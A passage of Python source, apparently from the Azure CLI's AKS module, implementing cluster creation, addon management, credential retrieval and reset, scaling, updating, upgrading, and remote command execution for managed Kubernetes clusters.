network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise ArgumentUsageError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if enable_azure_rbac is True:
raise ArgumentUsageError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
# pylint: disable=line-too-long
assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
# pylint: disable=line-too-long
raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
# pylint: disable=line-too-long
'kubeletidentity': ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(
cmd.cli_ctx,
cluster_identity_object_id,
assign_kubelet_identity)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
identity_profile=identity_profile
)
use_custom_private_dns_zone = False
if private_dns_zone:
if not enable_private_cluster:
raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
"It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise InvalidArgumentValueError(
private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError("--fqdn-subdomain should only be used for "
"private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if edge_zone:
ExtendedLocation = cmd.get_models('ExtendedLocation',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
mc.extended_location = ExtendedLocation(
name=edge_zone,
type=ExtendedLocationTypes.EDGE_ZONE
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {
'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
custom_headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
enable_managed_identity=False,
assign_identity=None,
yes=False,
no_wait=False,
enable_azure_rbac=False,
disable_azure_rbac=False):
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and
not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
not no_uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub and
not windows_admin_password and
not enable_managed_identity and
not assign_identity):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--no-uptime-sla" or '
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--windows-admin-password" or '
'"--enable-managed-identity" or '
'"--assign-identity" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac"')
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/"'
'"--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update '
'the cluster to use {} managed identity.\n After updating, your '
'cluster\'s control plane and addon pods will switch to use managed '
'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
'until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to '
'update the cluster to use {} managed identity. \nAre you sure you want to '
'perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
# pylint: disable=line-too-long
user_assigned_identity = {
assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
'Linux'].enabled
return _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
None,
no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
